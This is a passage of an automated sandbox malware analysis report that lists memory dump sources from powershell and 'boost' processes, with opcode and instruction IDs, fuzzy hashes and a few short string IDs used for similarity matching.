                                                                            • Instruction Fuzzy Hash: 9121062290EA878FF7A6CB3C44615756AC2EF62214B49A0B9C18EC71A2CF18DD099381
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1676944775.00007FFAAC680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC680000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_7ffaac680000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d45404973a27b871c4db78ea9f86f7a5f5d8dd36d24b886f03e22eef59c2ac0a
                                                                            • Instruction ID: c694c0883d3055852fd10f3b15c6d828af4271a1d6b069e6f5c3799b34b319ad
                                                                            • Opcode Fuzzy Hash: d45404973a27b871c4db78ea9f86f7a5f5d8dd36d24b886f03e22eef59c2ac0a
                                                                            • Instruction Fuzzy Hash: 2011A33290F6858FF7A6DB7894A49B87BD1EF02210B4964FAD65DC7493DF18ED088381
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1668950680.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_7ffaac5b0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                            • Instruction ID: 9734953e55ba6020dfa6fd68283ddc5c6f3e0e898dd62d03ef2e06dc28d86645
                                                                            • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                            • Instruction Fuzzy Hash: CB01A77010CB0C8FD744EF0CE051AA6B7E0FB89320F10052DE58AC3661DA32E882CB41
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1668950680.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_7ffaac5b0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: K_^$K_^$K_^$K_^
                                                                            • API String ID: 0-4267328068
                                                                            • Opcode ID: f5874f1f825d5651814a15e92f5ad4d60e5ad0dbc9cef1bc5a8513020bc6c840
                                                                            • Instruction ID: e26594ed18527427c026b6425f31a9e8a183643b3cf6c24931d06aa0ce994c93
                                                                            • Opcode Fuzzy Hash: f5874f1f825d5651814a15e92f5ad4d60e5ad0dbc9cef1bc5a8513020bc6c840
                                                                            • Instruction Fuzzy Hash: 61C19FA7D5E3C38FE317873C58690D67FA0EE1322871942EBD0D58E093EA14548AD7E6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1668950680.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_7ffaac5b0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: K_^$K_^$K_^$K_^
                                                                            • API String ID: 0-3666970850
                                                                            • Opcode ID: afb770274ed092b2536a1487612e8d27bc5f3e279fa3d9872dcf1cd6b05b0f13
                                                                            • Instruction ID: fbcb0d850c2c75942c756cf073aabcdbe1199fe1b3fbd801552622ab1ccca050
                                                                            • Opcode Fuzzy Hash: afb770274ed092b2536a1487612e8d27bc5f3e279fa3d9872dcf1cd6b05b0f13
                                                                            • Instruction Fuzzy Hash: 48418352D5E3C28FE757872C58680D57FA0EF57228B0D82F7D0948B0D3EA18984AD3E6
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.1941943336.00007FFAAC660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC660000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_7ffaac660000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5341b89cf77e63d7005b36d6623040807168e9eca96c5d51d00462952d1dbbe9
                                                                            • Instruction ID: b25ae7a9f756430adaed10d3b2e87c9b954f792bd8efecee99db67de4bddf835
                                                                            • Opcode Fuzzy Hash: 5341b89cf77e63d7005b36d6623040807168e9eca96c5d51d00462952d1dbbe9
                                                                            • Instruction Fuzzy Hash: 49D1566190EB8A8FF75AE738A8155B5BFA0EF46310B0851BED44DC71D3DD28D80983D1
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.1940541666.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_7ffaac590000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 69ec1659b70513f331842407f7fa327074cb9f0bccf049c7860ae5f988789f09
                                                                            • Instruction ID: dc7cb9f5f25247f65f9cf8b3e847d5d856d15e2830ce30193772343bcc911cea
                                                                            • Opcode Fuzzy Hash: 69ec1659b70513f331842407f7fa327074cb9f0bccf049c7860ae5f988789f09
                                                                            • Instruction Fuzzy Hash: A551B93191CB498FDB1C9F5C98466A8BBE0FB99721F00426FE04D93651CB75B456CBC2
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.1941943336.00007FFAAC660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC660000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_7ffaac660000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 630e3a47565b7d7024f95f79bcaf4be672862f439e78300f605d7e5ba630521c
                                                                            • Instruction ID: f21ca90410cf59f10fbb0bd0da1a8d783ab520b7e481ea1ae3391601d91d3149
                                                                            • Opcode Fuzzy Hash: 630e3a47565b7d7024f95f79bcaf4be672862f439e78300f605d7e5ba630521c
                                                                            • Instruction Fuzzy Hash: FF51E822A0DA868FF79ED71C9451674F7D1EF96321B19A0BAC14EC7193EE14EC0983C5
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.1940541666.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_7ffaac590000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c0e82ef28913307f4c19a27de68003e69001149bb4b03be653c7897768fe6de8
                                                                            • Instruction ID: 5eb10704390ebf591e7d062d278b8b9b3b8b1e92dab75f979016fc70a2c57315
                                                                            • Opcode Fuzzy Hash: c0e82ef28913307f4c19a27de68003e69001149bb4b03be653c7897768fe6de8
                                                                            • Instruction Fuzzy Hash: 0A41097190DB888FE7189F5CA84A6B97FE4FB56310F04416FE04DC3292CE25A815CBC2
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.1939182290.00007FFAAC47D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC47D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_7ffaac47d000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b1e6df48d4aebab2aa4947a026e1bf1d3e8a0f0bc2325835c43cec7be70bc0ff
                                                                            • Instruction ID: f3a2b53bf0aa371747f739fb1ef7dc5c330c1725d5169322678b8303a51eed70
                                                                            • Opcode Fuzzy Hash: b1e6df48d4aebab2aa4947a026e1bf1d3e8a0f0bc2325835c43cec7be70bc0ff
                                                                            • Instruction Fuzzy Hash: 1C41057140EBC48FE756CB2998459623FB0EF53324B1506EFD089CB1A3D625E84AC792
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.1940541666.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_7ffaac590000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8e26b74bfaba1cfdb5fcd3535ffcb27f9d8fa6dfb6e6e911a1d3836a90ae097e
                                                                            • Instruction ID: e65510941f33a533ef340678191515ec0db3afdfff28c35fcdc9bd16578cc451
                                                                            • Opcode Fuzzy Hash: 8e26b74bfaba1cfdb5fcd3535ffcb27f9d8fa6dfb6e6e911a1d3836a90ae097e
                                                                            • Instruction Fuzzy Hash: A221E93190C74C8FEB59DBAC984A7E97FE0EB96321F04816BD04DC3152DA75A419C792
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.1940541666.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_7ffaac590000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 68260b981374b7e61c28ce9f7c7f3ace4820091b8de4a938562f9edd47f54ba2
                                                                            • Instruction ID: 27d0ce9ad756a26e62f0539c0b81a0782c0c7b8b4a3118fd4649be2b0a14b3c5
                                                                            • Opcode Fuzzy Hash: 68260b981374b7e61c28ce9f7c7f3ace4820091b8de4a938562f9edd47f54ba2
                                                                            • Instruction Fuzzy Hash: 5911C66798EA8B8BF7919B1C98560E43BA4EF53214B0882F3E04C97093DD1AD80D82E1
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.1940541666.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_7ffaac590000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                            • Instruction ID: 87eadb6654d61433683f2c66da77b1f1539f0b58070b408ac67488b96e791635
                                                                            • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                            • Instruction Fuzzy Hash: 5301677115CB0D8FD744EF0CE451AA5B7E0FB99364F10056DE58AC3661DA36E882CB45
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.1941943336.00007FFAAC660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC660000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_7ffaac660000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: de73da3785e057e6e68bcf7cadae2c8699a18263fb1f781cfd44b041987fbd00
                                                                            • Instruction ID: 6de636e7dc1a0b3535e7d5ae9b6e1e049c72f32d61963f1a961d5782ff56637e
                                                                            • Opcode Fuzzy Hash: de73da3785e057e6e68bcf7cadae2c8699a18263fb1f781cfd44b041987fbd00
                                                                            • Instruction Fuzzy Hash: 97F0BE32A0D5448FE75AEB1CE0428A8B7E0EF06320B0150B6E04EC7463DE26EC44C780
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.1941943336.00007FFAAC660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC660000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_7ffaac660000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ba98893f7128143df14ad1810441791ecbd0664426f48b3ea54c8088d3ec9065
                                                                            • Instruction ID: c942036991a7f48ddaae9f9db7f1f69e683e6e60c4653fce841e872807cfdde3
                                                                            • Opcode Fuzzy Hash: ba98893f7128143df14ad1810441791ecbd0664426f48b3ea54c8088d3ec9065
                                                                            • Instruction Fuzzy Hash: 33F08C32A0D5458FE76ADB1CE4408F8B7E0EF5636070560BAE15DC71A2EA25EC46CB80
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.1940541666.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_7ffaac590000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: M_^5$M_^8$M_^F$M_^I$M_^K
                                                                            • API String ID: 0-2170160206
                                                                            • Opcode ID: 74b63124fd5fea35c7cd052b3b0a08978ada7e42a90d4f0c3ce84e54da50b638
                                                                            • Instruction ID: 53471a2640fec7c06fa4d70b4698bf4fa29dcbb1e8fa7553977c863a824dfc69
                                                                            • Opcode Fuzzy Hash: 74b63124fd5fea35c7cd052b3b0a08978ada7e42a90d4f0c3ce84e54da50b638
                                                                            • Instruction Fuzzy Hash: D02125B7718166CAD2013B7DAC259DC7784CF9827538987F2E199CF293EC18608A8980
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.2017451899.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_7ffaac5a0000_boost.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dce58bc73483f0acd831f35275ea3df0bf187c2931041cbb648afb995d5088d0
                                                                            • Instruction ID: 39a56116ed9e9731cbdddecaa9902b2253b589d1a758b739bda7a4ef3410f77d
                                                                            • Opcode Fuzzy Hash: dce58bc73483f0acd831f35275ea3df0bf187c2931041cbb648afb995d5088d0
                                                                            • Instruction Fuzzy Hash: 9E42E861B6CA0A8FF794F73CC4596B977D6FF99700F508579E04EC3292DE28A8058781
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.2017451899.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_7ffaac5a0000_boost.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d378dd7c564af50e44f5087af5b63a8ae428f81b44646a36a315fb52313310ee
                                                                            • Instruction ID: e7bf455ecc3ebd7dc92f4835d0e075b18a93c7e0771772d20282253b581b67f5
                                                                            • Opcode Fuzzy Hash: d378dd7c564af50e44f5087af5b63a8ae428f81b44646a36a315fb52313310ee
                                                                            • Instruction Fuzzy Hash: 48513551A5E6CA8FE786A73898786767FD8EF57215B0804FBE0CDC7193DD084806C382
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.2017451899.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_7ffaac5a0000_boost.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c001db31b47fc13309de00046071136855f3cfa6e54a6f39cc52ac14463d2430
                                                                            • Instruction ID: d9a268a67ce6622ed8a881eb7501f308a4481c626e7f38263ddeee6098d213de
                                                                            • Opcode Fuzzy Hash: c001db31b47fc13309de00046071136855f3cfa6e54a6f39cc52ac14463d2430
                                                                            • Instruction Fuzzy Hash: F0914922A1D68A8FE745A73CD86A5F97BE1EF87310B0841F7D04EC7193DD18AC4A8391
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.2017451899.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_7ffaac5a0000_boost.jbxd